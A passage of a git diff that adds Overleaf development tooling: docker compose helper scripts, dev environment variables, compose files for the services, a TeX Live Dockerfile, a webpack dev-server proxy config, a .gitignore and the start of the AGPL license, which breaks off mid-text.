diff --git a/develop/bin/build b/develop/bin/build new file mode 100755 index 0000000..bd30abc --- /dev/null +++ b/develop/bin/build @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +docker compose build --pull "$@" diff --git a/develop/bin/dev b/develop/bin/dev new file mode 100755 index 0000000..1dca01c --- /dev/null +++ b/develop/bin/dev @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +docker-compose -f docker-compose.yml -f docker-compose.dev.yml up --no-deps --detach "$@" diff --git a/develop/bin/down b/develop/bin/down new file mode 100755 index 0000000..3eaad36 --- /dev/null +++ b/develop/bin/down @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +docker compose down "$@" diff --git a/develop/bin/logs b/develop/bin/logs new file mode 100755 index 0000000..3288ec0 --- /dev/null +++ b/develop/bin/logs @@ -0,0 +1,9 @@ +#!/usr/bin/env bash + +docker compose logs --follow --tail 10 --no-color "$@" \ + | ggrep --line-buffered --invert-match "global.gc" \ + | ggrep --line-buffered --invert-match "health.check" \ + | ggrep --line-buffered --invert-match "slow event loop" \ + | ggrep --line-buffered --invert-match "process.memoryUsage" \ + | ggrep --line-buffered --only-matching "[{].*" \ + | bunyan --output short diff --git a/develop/bin/shell b/develop/bin/shell new file mode 100755 index 0000000..0929c51 --- /dev/null +++ b/develop/bin/shell @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +docker compose exec -it "$@" /bin/bash diff --git a/develop/bin/up b/develop/bin/up new file mode 100755 index 0000000..b39c4e3 --- /dev/null +++ b/develop/bin/up @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +docker compose up --detach "$@" diff --git a/develop/compiles/.gitkeep b/develop/compiles/.gitkeep new file mode 100644 index 0000000..e69de29 diff --git a/develop/dev.env b/develop/dev.env new file mode 100644 index 0000000..aae9149 --- /dev/null +++ b/develop/dev.env @@ -0,0 +1,20 @@ +CHAT_HOST=chat +CLSI_HOST=clsi +CONTACTS_HOST=contacts +DOCSTORE_HOST=docstore +DOCUMENT_UPDATER_HOST=document-updater +FILESTORE_HOST=filestore +GRACEFUL_SHUTDOWN_DELAY_SECONDS=0 +HISTORY_V1_HOST=history-v1 +LISTEN_ADDRESS=0.0.0.0 +MONGO_HOST=mongo +MONGO_URL=mongodb://mongo/sharelatex?directConnection=true +NOTIFICATIONS_HOST=notifications +PROJECT_HISTORY_HOST=project-history +REALTIME_HOST=real-time +REDIS_HOST=redis +SESSION_SECRET=foo +WEBPACK_HOST=webpack +WEB_API_PASSWORD=overleaf +WEB_API_USER=overleaf +WEB_HOST=web diff --git a/develop/docker-compose.dev.yml b/develop/docker-compose.dev.yml new file mode 100644 index 0000000..4432a24 --- /dev/null +++ b/develop/docker-compose.dev.yml @@ -0,0 +1,139 @@ +services: + clsi: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9230:9229" + volumes: + - ../services/clsi/app:/overleaf/services/clsi/app + - ../services/clsi/app.js:/overleaf/services/clsi/app.js + - ../services/clsi/config:/overleaf/services/clsi/config + + chat: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9231:9229" + volumes: + - ../services/chat/app:/overleaf/services/chat/app + - ../services/chat/app.js:/overleaf/services/chat/app.js + - ../services/chat/config:/overleaf/services/chat/config + + contacts: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9232:9229" + volumes: + - ../services/contacts/app:/overleaf/services/contacts/app + - ../services/contacts/app.js:/overleaf/services/contacts/app.js + - 
../services/contacts/config:/overleaf/services/contacts/config + + docstore: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9233:9229" + volumes: + - ../services/docstore/app:/overleaf/services/docstore/app + - ../services/docstore/app.js:/overleaf/services/docstore/app.js + - ../services/docstore/config:/overleaf/services/docstore/config + + document-updater: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9234:9229" + volumes: + - ../services/document-updater/app:/overleaf/services/document-updater/app + - ../services/document-updater/app.js:/overleaf/services/document-updater/app.js + - ../services/document-updater/config:/overleaf/services/document-updater/config + + filestore: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9235:9229" + volumes: + - ../services/filestore/app:/overleaf/services/filestore/app + - ../services/filestore/app.js:/overleaf/services/filestore/app.js + - ../services/filestore/config:/overleaf/services/filestore/config + + history-v1: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9239:9229" + volumes: + - ../services/history-v1/api:/overleaf/services/history-v1/api + - ../services/history-v1/app.js:/overleaf/services/history-v1/app.js + - ../services/history-v1/config:/overleaf/services/history-v1/config + - ../services/history-v1/storage:/overleaf/services/history-v1/storage + - ../services/history-v1/knexfile.js:/overleaf/services/history-v1/knexfile.js + - ../services/history-v1/migrations:/overleaf/services/history-v1/migrations + + notifications: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9236:9229" + volumes: + - ../services/notifications/app:/overleaf/services/notifications/app + - ../services/notifications/app.js:/overleaf/services/notifications/app.js + - ../services/notifications/config:/overleaf/services/notifications/config + + project-history: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9240:9229" + volumes: + - ../services/project-history/app:/overleaf/services/project-history/app + - ../services/project-history/app.js:/overleaf/services/project-history/app.js + - ../services/project-history/config:/overleaf/services/project-history/config + + real-time: + command: ["node", "--watch", "app.js"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9237:9229" + volumes: + - ../services/real-time/app:/overleaf/services/real-time/app + - ../services/real-time/app.js:/overleaf/services/real-time/app.js + - ../services/real-time/config:/overleaf/services/real-time/config + + web: + command: ["node", "--watch", "app.js", "--watch-locales"] + environment: + - NODE_OPTIONS=--inspect=0.0.0.0:9229 + ports: + - "127.0.0.1:9229:9229" + volumes: + - ../services/web/app:/overleaf/services/web/app + - ../services/web/app.mjs:/overleaf/services/web/app.mjs + - ../services/web/config:/overleaf/services/web/config + - ../services/web/locales:/overleaf/services/web/locales + - ../services/web/modules:/overleaf/services/web/modules + - ../services/web/public:/overleaf/services/web/public + + webpack: + volumes: + - ../services/web/app:/overleaf/services/web/app + - 
../services/web/config:/overleaf/services/web/config + - ../services/web/frontend:/overleaf/services/web/frontend + - ../services/web/locales:/overleaf/services/web/locales + - ../services/web/modules:/overleaf/services/web/modules + - ../services/web/public:/overleaf/services/web/public + - ../services/web/transform:/overleaf/services/web/transform + - ../services/web/types:/overleaf/services/web/types + - ../services/web/webpack-plugins:/overleaf/services/web/webpack-plugins diff --git a/develop/docker-compose.yml b/develop/docker-compose.yml new file mode 100644 index 0000000..e37999f --- /dev/null +++ b/develop/docker-compose.yml @@ -0,0 +1,175 @@ +volumes: + clsi-cache: + clsi-output: + filestore-public-files: + filestore-template-files: + filestore-uploads: + filestore-user-files: + mongo-data: + redis-data: + sharelatex-data: + web-data: + history-v1-buckets: + +services: + chat: + build: + context: .. + dockerfile: services/chat/Dockerfile + env_file: + - dev.env + + clsi: + build: + context: .. + dockerfile: services/clsi/Dockerfile + env_file: + - dev.env + environment: + - DOCKER_RUNNER=true + - TEXLIVE_IMAGE=texlive-full # docker build texlive -t texlive-full + - COMPILES_HOST_DIR=${PWD}/compiles + - OUTPUT_HOST_DIR=${PWD}/output + user: root + volumes: + - ${PWD}/compiles:/overleaf/services/clsi/compiles + - ${DOCKER_SOCKET_PATH:-/var/run/docker.sock}:/var/run/docker.sock + - clsi-cache:/overleaf/services/clsi/cache + - clsi-output:/overleaf/services/clsi/output + + contacts: + build: + context: .. + dockerfile: services/contacts/Dockerfile + env_file: + - dev.env + + docstore: + build: + context: .. + dockerfile: services/docstore/Dockerfile + env_file: + - dev.env + + document-updater: + build: + context: .. + dockerfile: services/document-updater/Dockerfile + env_file: + - dev.env + + filestore: + build: + context: .. + dockerfile: services/filestore/Dockerfile + env_file: + - dev.env +# environment: +# - ENABLE_CONVERSIONS=true + volumes: + - filestore-public-files:/overleaf/services/filestore/public_files + - filestore-template-files:/overleaf/services/filestore/template_files + - filestore-uploads:/overleaf/services/filestore/uploads + - filestore-user-files:/overleaf/services/filestore/user_files + + history-v1: + build: + context: .. + dockerfile: services/history-v1/Dockerfile + env_file: + - dev.env + environment: + OVERLEAF_EDITOR_ANALYTICS_BUCKET: "/buckets/analytics" + OVERLEAF_EDITOR_BLOBS_BUCKET: "/buckets/blobs" + OVERLEAF_EDITOR_CHUNKS_BUCKET: "/buckets/chunks" + OVERLEAF_EDITOR_PROJECT_BLOBS_BUCKET: "/buckets/project_blobs" + OVERLEAF_EDITOR_ZIPS_BUCKET: "/buckets/zips" + PERSISTOR_BACKEND: fs + volumes: + - history-v1-buckets:/buckets + + mongo: + image: mongo:6.0 + command: --replSet overleaf + ports: + - "127.0.0.1:27017:27017" # for debugging + volumes: + - mongo-data:/data/db + - ../bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the + # replica set. This override is not needed when running the setup after + # starting up mongo. + - mongo:127.0.0.1 + + notifications: + build: + context: .. + dockerfile: services/notifications/Dockerfile + env_file: + - dev.env + + project-history: + build: + context: .. + dockerfile: services/project-history/Dockerfile + env_file: + - dev.env + + real-time: + build: + context: .. 
+ dockerfile: services/real-time/Dockerfile + env_file: + - dev.env + + redis: + image: redis:5 + ports: + - "127.0.0.1:6379:6379" # for debugging + volumes: + - redis-data:/data + + web: + build: + context: .. + dockerfile: services/web/Dockerfile + target: dev + env_file: + - dev.env + environment: + - APP_NAME=Overleaf Community Edition + - ENABLED_LINKED_FILE_TYPES=project_file,project_output_file + - EMAIL_CONFIRMATION_DISABLED=true + - NODE_ENV=development + - OVERLEAF_ALLOW_PUBLIC_ACCESS=true + command: ["node", "app.mjs"] + volumes: + - sharelatex-data:/var/lib/overleaf + - web-data:/overleaf/services/web/data + depends_on: + - mongo + - redis + - chat + - clsi + - contacts + - docstore + - document-updater + - filestore + - history-v1 + - notifications + - project-history + - real-time + + webpack: + build: + context: .. + dockerfile: services/web/Dockerfile + target: webpack + command: ["npx", "webpack", "serve", "--config", "webpack.config.dev-env.js"] + ports: + - "127.0.0.1:80:3808" + volumes: + - ./webpack.config.dev-env.js:/overleaf/services/web/webpack.config.dev-env.js diff --git a/develop/texlive/Dockerfile b/develop/texlive/Dockerfile new file mode 100644 index 0000000..944681a --- /dev/null +++ b/develop/texlive/Dockerfile @@ -0,0 +1,8 @@ +FROM debian:testing-slim + +RUN apt-get update +RUN apt-cache depends texlive-full | grep "Depends: " | grep -v -- "-doc" | grep -v -- "-lang-" | sed 's/Depends: //' | xargs apt-get install -y --no-install-recommends +RUN apt-get install -y --no-install-recommends fontconfig inkscape pandoc python3-pygments + +RUN useradd tex +USER tex diff --git a/develop/webpack.config.dev-env.js b/develop/webpack.config.dev-env.js new file mode 100644 index 0000000..49f8540 --- /dev/null +++ b/develop/webpack.config.dev-env.js @@ -0,0 +1,23 @@ +const { merge } = require('webpack-merge') + +const base = require('./webpack.config.dev') + +module.exports = merge(base, { + devServer: { + allowedHosts: 'auto', + devMiddleware: { + index: false, + }, + proxy: [ + { + context: '/socket.io/**', + target: 'http://real-time:3026', + ws: true, + }, + { + context: ['!**/*.js', '!**/*.css', '!**/*.json'], + target: 'http://web:3000', + }, + ], + }, +}) diff --git a/doc/logo.png b/doc/logo.png new file mode 100644 index 0000000..106926b Binary files /dev/null and b/doc/logo.png differ diff --git a/doc/screenshot.png b/doc/screenshot.png new file mode 100644 index 0000000..1c1f339 Binary files /dev/null and b/doc/screenshot.png differ diff --git a/docker-compose.debug.yml b/docker-compose.debug.yml new file mode 100644 index 0000000..cf87fbf --- /dev/null +++ b/docker-compose.debug.yml @@ -0,0 +1,23 @@ +version: '2.2' +services: + sharelatex: + ports: + - 30000:30000 + - 30150:30150 + - 30120:30120 + - 30050:30050 + - 30420:30420 + - 30030:30030 + - 30160:30160 + - 30360:30360 + - 30130:30130 + - 30100:30100 + - 30540:30540 + - 30640:30640 + - 40000:40000 + + # Server Pro + - 30070:30070 + - 30400:30400 + environment: + DEBUG_NODE: 'true' diff --git a/docker-compose.yml b/docker-compose.yml new file mode 100644 index 0000000..8ca5112 --- /dev/null +++ b/docker-compose.yml @@ -0,0 +1,146 @@ +services: + sharelatex: + restart: always + # Server Pro users: + # image: quay.io/sharelatex/sharelatex-pro + image: sharelatex/sharelatex:arm64 + container_name: sharelatex + depends_on: + mongo: + condition: service_healthy + redis: + condition: service_started + ports: + - 80:80 + stop_grace_period: 60s + volumes: + - ~/overleaf/sharelatex_data:/var/lib/overleaf + # - 
/opt/homebrew/Cellar/texlive:/usr/local/texlive + ######################################################################## + #### Server Pro: Uncomment the following line to mount the docker #### + #### socket, required for Sibling Containers to work #### + ######################################################################## + # - /var/run/docker.sock:/var/run/docker.sock + environment: + + OVERLEAF_APP_NAME: Overleaf Community Edition + + OVERLEAF_MONGO_URL: mongodb://mongo/sharelatex + + # Same property, unfortunately with different names in + # different locations + OVERLEAF_REDIS_HOST: redis + REDIS_HOST: redis + + ENABLED_LINKED_FILE_TYPES: 'project_file,project_output_file' + + # Enables Thumbnail generation using ImageMagick + ENABLE_CONVERSIONS: 'true' + + # Disables email confirmation requirement + EMAIL_CONFIRMATION_DISABLED: 'true' + + ## Set for SSL via nginx-proxy + #VIRTUAL_HOST: 103.112.212.22 + + # OVERLEAF_SITE_URL: http://overleaf.example.com + # OVERLEAF_NAV_TITLE: Overleaf Community Edition + # OVERLEAF_HEADER_IMAGE_URL: http://example.com/mylogo.png + # OVERLEAF_ADMIN_EMAIL: support@it.com + + # OVERLEAF_LEFT_FOOTER: '[{"text": "Another page I want to link to can be found here"} ]' + # OVERLEAF_RIGHT_FOOTER: '[{"text": "Hello I am on the Right"} ]' + + # OVERLEAF_EMAIL_FROM_ADDRESS: "hello@example.com" + + # OVERLEAF_EMAIL_AWS_SES_ACCESS_KEY_ID: + # OVERLEAF_EMAIL_AWS_SES_SECRET_KEY: + + # OVERLEAF_EMAIL_SMTP_HOST: smtp.example.com + # OVERLEAF_EMAIL_SMTP_PORT: 587 + # OVERLEAF_EMAIL_SMTP_SECURE: false + # OVERLEAF_EMAIL_SMTP_USER: + # OVERLEAF_EMAIL_SMTP_PASS: + # OVERLEAF_EMAIL_SMTP_TLS_REJECT_UNAUTH: true + # OVERLEAF_EMAIL_SMTP_IGNORE_TLS: false + # OVERLEAF_EMAIL_SMTP_NAME: '127.0.0.1' + # OVERLEAF_EMAIL_SMTP_LOGGER: true + # OVERLEAF_CUSTOM_EMAIL_FOOTER: "This system is run by department x" + + # ENABLE_CRON_RESOURCE_DELETION: true + + ################ + ## Server Pro ## + ################ + + ## Sandboxed Compiles: https://github.com/overleaf/overleaf/wiki/Server-Pro:-Sandboxed-Compiles + # SANDBOXED_COMPILES: 'true' + # SANDBOXED_COMPILES_SIBLING_CONTAINERS: 'true' + ### Bind-mount source for /var/lib/overleaf/data/compiles inside the container. + # SANDBOXED_COMPILES_HOST_DIR_COMPILES: '/home/user/sharelatex_data/data/compiles' + ### Bind-mount source for /var/lib/overleaf/data/output inside the container. 
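+      ### Note: both HOST_DIR values must be absolute paths on the Docker host,
+      ### since with sibling containers the host's Docker daemon (not this
+      ### container) resolves the bind mounts.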
+ # SANDBOXED_COMPILES_HOST_DIR_OUTPUT: '/home/user/sharelatex_data/data/output' + + ## Works with test LDAP server shown at bottom of docker compose + # OVERLEAF_LDAP_URL: 'ldap://ldap:389' + # OVERLEAF_LDAP_SEARCH_BASE: 'ou=people,dc=planetexpress,dc=com' + # OVERLEAF_LDAP_SEARCH_FILTER: '(uid={{username}})' + # OVERLEAF_LDAP_BIND_DN: 'cn=admin,dc=planetexpress,dc=com' + # OVERLEAF_LDAP_BIND_CREDENTIALS: 'GoodNewsEveryone' + # OVERLEAF_LDAP_EMAIL_ATT: 'mail' + # OVERLEAF_LDAP_NAME_ATT: 'cn' + # OVERLEAF_LDAP_LAST_NAME_ATT: 'sn' + # OVERLEAF_LDAP_UPDATE_USER_DETAILS_ON_LOGIN: 'true' + + # OVERLEAF_TEMPLATES_USER_ID: "578773160210479700917ee5" + # OVERLEAF_NEW_PROJECT_TEMPLATE_LINKS: '[ {"name":"All Templates","url":"/templates/all"}]' + + + # OVERLEAF_PROXY_LEARN: "true" + + mongo: + restart: always + image: mongo:6.0 + container_name: mongo + command: '--replSet overleaf' + volumes: + - ~/overleaf/mongo_data:/data/db + - ./bin/shared/mongodb-init-replica-set.js:/docker-entrypoint-initdb.d/mongodb-init-replica-set.js + environment: + MONGO_INITDB_DATABASE: sharelatex + extra_hosts: + # Required when using the automatic database setup for initializing the replica set. + # This override is not needed when running the setup after starting up mongo. + - mongo:127.0.0.1 + healthcheck: + test: echo 'db.stats().ok' | mongosh localhost:27017/test --quiet + interval: 10s + timeout: 10s + retries: 5 + + redis: + restart: always + image: redis:6.2 + container_name: redis + volumes: + - ~/overleaf/redis_data:/data + + # ldap: + # restart: always + # image: rroemhild/test-openldap + # container_name: ldap + + # See https://github.com/jwilder/nginx-proxy for documentation on how to configure the nginx-proxy container, + # and https://github.com/overleaf/overleaf/wiki/HTTPS-reverse-proxy-using-Nginx for an example of some recommended + # settings. We recommend using a properly managed nginx instance outside of the Overleaf Server Pro setup, + # but the example here can be used if you'd prefer to run everything with docker-compose + + # nginx-proxy: + # image: jwilder/nginx-proxy + # container_name: nginx-proxy + # ports: + # - "80:80" + # - "443:443" + # volumes: + # - /var/run/docker.sock:/tmp/docker.sock:ro + # - /home/overleaf/tmp:/etc/nginx/certs diff --git a/libraries/access-token-encryptor/.gitignore b/libraries/access-token-encryptor/.gitignore new file mode 100644 index 0000000..66936c4 --- /dev/null +++ b/libraries/access-token-encryptor/.gitignore @@ -0,0 +1,46 @@ +compileFolder + +Compiled source # +################### +*.com +*.class +*.dll +*.exe +*.o +*.so + +# Packages # +############ +# it's better to unpack these files and commit the raw source +# git has its own built in compression methods +*.7z +*.dmg +*.gz +*.iso +*.jar +*.rar +*.tar +*.zip + +# Logs and databases # +###################### +*.log +*.sql +*.sqlite + +# OS generated files # +###################### +.DS_Store? +ehthumbs.db +Icon? 
+Thumbs.db + +/node_modules/* +data/*/* + +**.swp + +/log.json +hash_folder + +.npmrc diff --git a/libraries/access-token-encryptor/.mocharc.json b/libraries/access-token-encryptor/.mocharc.json new file mode 100644 index 0000000..c492858 --- /dev/null +++ b/libraries/access-token-encryptor/.mocharc.json @@ -0,0 +1,6 @@ +{ + "ui": "bdd", + "recursive": "true", + "reporter": "spec", + "require": "test/setup.js" +} diff --git a/libraries/access-token-encryptor/.nvmrc b/libraries/access-token-encryptor/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/access-token-encryptor/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/access-token-encryptor/LICENSE b/libraries/access-token-encryptor/LICENSE new file mode 100644 index 0000000..dba13ed --- /dev/null +++ b/libraries/access-token-encryptor/LICENSE @@ -0,0 +1,661 @@ + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. 
This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. 
+ + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. 
+ + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. 
+ + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. 
+ + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require 